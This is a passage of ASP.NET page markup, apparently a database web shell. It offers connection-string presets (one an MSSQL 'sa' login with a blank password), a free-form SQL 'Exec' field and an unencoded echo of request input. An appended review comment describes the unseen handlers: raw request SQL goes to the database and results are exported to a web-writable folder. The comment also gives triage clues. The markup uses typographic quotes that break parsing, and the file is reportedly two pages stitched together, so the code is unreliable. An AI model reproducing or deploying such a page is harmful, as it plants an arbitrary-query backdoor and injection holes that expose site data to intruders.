document.getElementById('conn').value = "dsn";
}
// ]]>
</script>
<style type=”text/css”>
#sql
{
width: 677px;
height: 106px;
}
</style>
</head>
<body>
<form id=”form1″ runat=”server”>
<div>
<table><tr><td >
type:</td><td colspan=”2″><asp:DropDownList ID=”DropDownList1″ runat=”server”
onselectedindexchanged=”DropDownList1_SelectedIndexChanged”
AutoPostBack=”True”>
<asp:ListItem Value=”dsn=;uid=;pwd=;”>dsn</asp:ListItem>
<asp:ListItem Value=”Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb”>access</asp:ListItem>
<asp:ListItem Value=”server=localhost;UID=sa;PWD=;database=master”>mssql</asp:ListItem>
</asp:DropDownList>
<br/></td>
</tr>
<tr><td>
conn: </td><td><asp:TextBox ID=”connT” name=”conn” runat=”server” Width=”680px”></asp:TextBox></td><td>
<asp:Button
ID=”Button1″ runat=”server” Text=”Go”
onclick=”Button1_Click” />
<br/>
</td></tr>
<tr><td>tables</td><td colspan=”2″>
<asp:DropDownList ID=”DropDownList2″ runat=”server”>
</asp:DropDownList>
</td></tr>
<tr><td>sqlstr: </td><td><input type=”text” name=”sql” id=”sql” value=”<% =Request["sql"]%>”/></td><td>
<br />
<asp:Button ID=”Button2″ runat=”server” onclick=”Button2_Click” Text=”Exec” />
</td></tr>
</table>
<asp:GridView ID=”GridView1″ runat=”server” CellPadding=”4″ ForeColor=”#333333″
GridLines=”None”>
<RowStyle BackColor=”#EFF3FB” />
<FooterStyle BackColor=”#507CD1″ Font-Bold=”True” ForeColor=”White” />
<PagerStyle BackColor=”#2461BF” ForeColor=”White” HorizontalAlign=”Center” />
<SelectedRowStyle BackColor=”#D1DDF1″ Font-Bold=”True” ForeColor=”#333333″ />
<HeaderStyle BackColor=”#507CD1″ Font-Bold=”True” ForeColor=”White” />
<EditRowStyle BackColor=”#2461BF” />
<AlternatingRowStyle BackColor=”White” />
</asp:GridView>
</div>
</form>
</body>
</html>
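Review bot: This file is two separate pages pasted together (the `=====` line and a second `<%@ Page %>` directive follow the first `</html>`), and most of its string delimiters are typographic quotes (`”`, `“`) rather than `"`, so as shown it would not parse as ASP.NET; content signatures written against ASCII-quoted strings can miss a copy like this, assuming the quotes are in the committed file and not a rendering artefact. A header comment should say what each half does: the first `Button1_Click` builds a connection string and a `select` statement by concatenating text-box values and writes the result set to numbered files in a `DataOut` directory beside the page, and the second half's `Button2_Click` assigns `Request["sql"]` unchanged to `CommandText` on a connection opened from the `connT` text box. For triage, a web-writable `DataOut` folder holding `<n>_<name>` exports, or an .aspx that passes request input straight to `CommandText`, are the artefacts to look for. The `value=”<% =Request["sql"]%>”` attribute in the second form also echoes request input without encoding.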